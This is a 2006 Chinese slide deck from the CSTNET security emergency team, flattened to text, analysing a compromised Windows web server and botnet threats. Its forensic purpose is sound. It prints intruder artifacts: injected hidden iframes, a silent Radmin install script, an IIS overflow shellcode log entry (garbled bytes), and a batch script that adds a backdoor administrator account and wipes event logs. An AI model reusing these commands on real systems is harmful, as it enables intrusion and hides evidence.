黑客攻击与僵尸网络

中国科学院计算机网络信息中心中国科技网 rights reserved黑客攻击与僵尸网络中国科技网网络安全应急小组荆涛2006-6-15网络中的安全威胁„网内威胁…蠕虫病毒…僵尸主机„网外威胁…单机„蠕虫、病毒(网页木马、邮件病毒)„黑客扫描攻击(黑客木马、网页木马等等)„僵尸网络…服务器„黑客扫描攻击„僵尸网络„网络应用服务攻击（网站、数据库）网络中的安全威胁网络内部、外部泄密拒绝服务攻击逻辑炸弹特洛伊木马黑客攻击计算机病毒信息丢失、篡改、销毁后门、隐蔽通道蠕虫黑客入侵技术的发展19801985199019952000密码猜测可自动复制的代码密码破解利用已知的漏洞破坏审计系统后门会话劫持擦除痕迹嗅探包欺骗GUI远程控制自动探测扫描拒绝服务高黑客攻击的常用方法„口令破解„木马„缓冲区溢出及攻击„系统扫描…主机开放端口的扫描…主机漏洞…应用服务漏洞黑客攻击的安全事件„某所报告web服务器运行缓慢，主机上有大量可疑文件…主机情况：„主机操作系统:windows2000serverSP4„主机内存256M„MS-SQL2000sp3(已停用)„主机上挂载了9个http网站„administrator密码被改，„曾出现过非管理员人工重启现象。„系统被添加:TsInternetUser用户名„存在大量可疑文件（后面会详细说）主机上可疑文件（1）文件名路径功能diy.aspc:\asp的木马，可以通过服务远程查看磁盘文件，执行命令，连接本地数据库等3389.rarc:\WINNT\sp4\d:\swgk\lnm\website\download\windows远程管理的客户端，可以登陆其他的winodows机器。admin.exeadmin.rarc:\WINNT\sp4\d:\swgk\lnm\website\download\灰鸽子木马的服务端程序，通过反向连接实现远程控制。本文3.2有详细的介绍。adsl.exec:\WINNT\sp4\查看局域网中拨号用户的信息，偷窃拨号口令shanlu.exec:\WINNT\sp4\d:\swgk\lnm\website\download\多功能的扫描和攻击工具，功能包括：端口扫描，弱口令探测，暴力猜解密码等ssport.exec:\WINNT\sp4\简单的端口扫描器SQLTools.exec:\WINNT\sp4\简单的sqlserver客户端软件red.exec:\WINNT\sp4\rar的自解压执行文件，包含radmin远程控制的服务端程序，成功执行会绑定tcp5，等待远程控制请求sc32.exec:\WINNT\sp4\SocksCapV2代理服务器工具，可以使其他程序通过特定的代理实现通信主机上可疑文件（2）NT-scanner.exec:\WINNT\sp4\NT-scanner10扫描器，包括NT弱口令，SQL弱口令，port，IIS漏洞Domain3.5.exed:\swgk\lnm\website\download\Domain3.5sql注入综合利用工具，1.exed:\swgk\lnm\website\download\简单的端口扫描工具13.gifd:\swgk\lnm\website\download\文件扩展名更改为“gif”的asp木马文件3389.rard:\swgk\lnm\website\download\windows远程管理的客户端，可以登陆其他的winodows机器。aa.exed:\swgk\lnm\website\uploadfiles\asp\2005\7\30从用户登陆的WINLOGNO进程中提取密码的程序，可以查看登陆的用户的口令psulist.exed:\swgk\lnm\website\uploadfiles\asp\2005\7\30以system权限查看进程的工具，配合aa.exe使用ha.exehe.exed:\swgk\lnm\website\uploadfiles\asp\2005\7\30开启终端服务的程序，会导致windows2000重启show.exed:\swgk\lnm\website\uploadfiles\asp\2005\7\30利用serv-u程序漏洞的本地权限提升工具80340.asp165211.aspa.aspd:\swgk\lnm\website\uploadfiles\asp\2005\7\30asp的木马，165211.asp，a.asp是c/s模式的木马91914.asp94427.aspd:\swgk\lnm\website\uploadfiles\asp\2005\8\26asp的木马，33321.aspd:\swgk\lnm\website\uploadfiles\asp\2005\11\6asp的木马，c/s模式的木马H_Client.exeC:\DocumentsandSettings\桌面\灰鸽子灰鸽子木马的客户端程序查看历史痕迹－historyC:\MydocumentsandSetting\TsInternetUser\LocalSettings\HistorySQL注入修改英文主页„/htmliframesrc==zhuwidth=0height=0frameborder=0/html„/htmliframesrc==0height=0border=0/iframe„网上常用的工具：…阿福免杀网页木马制作工具影子Radmin„默认监听4899，修改为端口5„Red.exe…R.bat„@echooff„@Explorer.exe/uninstall/silence„@Explorer.exe/install/silence„@regedit/s1.reg„@netstartr_server„@delred.exe„@del1.reg„@delr.bat„@delu.bat…U.bat„@echooff„netstopr_server灰鸽子打包程序－admin.exe„伪装为微软的服务„安装名为windowsupdate的进程，迷惑用户„执行程序名称为：InternetExplorer.exe,放置在c:\windows下„调用正常IE进程，以防用户发觉„连接远程默认端口8000admin.exe执行后的网络行为1－本地主机向远程DNS主机61.*.*.125查询域名169*.huigezi.org2－远程DNS返回该域名IP222.*.*.2443－本地主机查询本地DNS服务器灰鸽子的IP列表更新镜像下载地址的域名，某虚拟主机virtualhost.*.com.cn4－得到该域名IP地址211.*.*.275、6、7－本地主机与远程虚拟主机进行TCP三次握手8、9、15、16、17、19－本地主机从远程虚拟主机下载灰鸽子IP列表镜像文件cuiyuge.jpg,并下载成功,断开连接。10-14－与之前设定的169*.huigezi.org主机首先进行上线连接，连接该主机的8000端口，但未连接成功。18、20-24－与从虚拟主机上下载下来的IP列表镜像中所记录的IP进行上线连接，远程端口8000，但远程主机端口未开放，因此本地主机进行重试请求连接。25－在请求IP列表镜像地址的连接无效后，在此重试请求上线连接169*.huigezi.orgWindowsNT/2000自动攻击探测机－shanlu.exe„扫描速度快„可根据各种应用来进行攻击渗透„通常用来扫弱口令主机…SQL漏洞:…sa帐号密码为空。…主机:219.*.*.183………由shanlu.exe扫描IIS产生的日志2005-11-2813:32:20211.*.*.130-*.**.580GET/NULL.IDACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙?悙恄?悙愯?　　峯饙}-悙悑鱢窰3蒮嬋礄　2莫恸$鞜櫃e狿(?絢7_辠檘敐櫃q潤檘讻櫃跍櫃q葲櫃q綒櫃逌櫃q'槞?譁櫃逌櫃q鏇櫃覝櫃q菣櫃q櫃?a欗y覝櫃蒮+敓櫃逌櫃蒮+敓櫃稖櫃蒮+-湙?　櫃蒮+-湙?櫃櫃?譁櫃蒮+\湙?櫃櫃蒮+O湙橺覝櫃髾髝殬櫃?覝櫃蒮+殶櫃Z敁勿鼢碡祉鲐眄　蚬汐⿺摂擇+櫃檉+&湙?稖櫃q_櫃?af?/櫃?a欗?+++髾　櫃神櫇櫃跍櫃?稖櫃蒮+/湙?a櫀櫃欝?　櫃?跍櫃?覝櫃蒮+殶櫃af睚++++r髾駲潤?跍櫃?覝櫃蒮+憻櫃a欗?+++af憩++++狟?　櫃噬跍櫃?　櫃蒮+5湙?a欗?+++p瞗ff猋裐猋Z狟?經櫃湿B适噬f++湙?a欗?+++經櫃Z!ffffZ櫃櫃跍櫃^欇櫃櫳f+䴗櫃跍櫃獪櫃谫讠疁櫃凇!槝櫃诘适猋缮少裳缮鞜櫃瑟Y蒮+顪櫃獪櫃蒮+-湙?疁櫃蒮+-湙?跍櫃橺駲潤欝賔+9湙橺猋?w洐橿檿櫃櫳獪櫃?稖櫃蒮+艤櫃猋?w洐櫳　櫃?疁櫃蒮+艤櫃Z櫃櫃櫃櫃槞櫃?笟櫃^殙櫃櫴蹪櫃噬f+e湙?Aa櫫錏ZZ墮櫃髪鰵櫃蒮+綗櫃鰵櫃蒮+　櫃a欗?+++闀ge4a欗?+++櫏擁i　韚?韖Zn4橺櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃跍櫃审沠+€煓欝欝橌沠+p湙?af?櫃?逌櫃　櫃^殬櫃欝澥鬂駀f櫃蒮+　櫃a欖?+++　鰺櫃　轁櫃锜櫃邼櫃af鞏++++q砯ff邼櫃逌櫃髩蹪櫃噬f+i湙?a欖?+++鬁逌櫃蒮+l湙?a欖?+++逌櫃Z猋Z洐欪櫃櫃櫃櫃櫃櫃!櫃h?≡?欗?+++裷hA辚歫镝歫绻歜讔狵衔?　b,翢櫃狿(瀓　頃++++榔^澺{F榔?S呓歓Hx歑狿　?邊歓Xx洑X櫄Z驘櫃Z覠櫃q蓹櫃䶮櫃Z$蕼櫃^蝢稒櫃粕玒狿nHek7?　韼++++晌Fq剻櫃?灹揶揶r@?　霺Z?䶮櫃蒮娐Z?$驘櫃噬f幤Z櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃櫃臆俗苷　欄朦　　痖鼨撄硎眸腠扉绪　鲐欄朦　　膂　觋貦邗鲫　　　鼨牲　坐酎　痖鼨搋鳆　仵貊鷻坞痦　瘐鼨它　唣觞櫴觞　櫷　麴鼬睃呻鳅　隀茚痦婉朦　櫃问　　欔鳅螯頇　鼾欟痍睃鳈　　轫欔　龣朦　欪貊挈牿　　櫸守薯　盱闄　眈鲫眵　鼨　眈鲫睇圜　鼨挈黻鳅蝣轫櫃櫿鲽　瘥滕豚貦撄砩膂　　朦觋欔?瞑?顧?{渃md.exe$200–类似的3389.batechooffnetuserTsInternetUser12345--TsInternetUser是win2k默认用户，我们更改密码netlocalgroupadministratorsTsInternetUser/add-添加到超级用户组-netuse\\127.0.0.1\ipc$12345/user:TsInternetUser-连接登陆，删除日志-cleaniislog.exe-s\\127.0.0.1-lapplication-Ccleaniislog.exe-s\\127.0.0.1-lsystem-Ccleaniislog.exe-s\\127.0.0.1-lsecurity-Cnetstopw3svc-停掉IIS，删除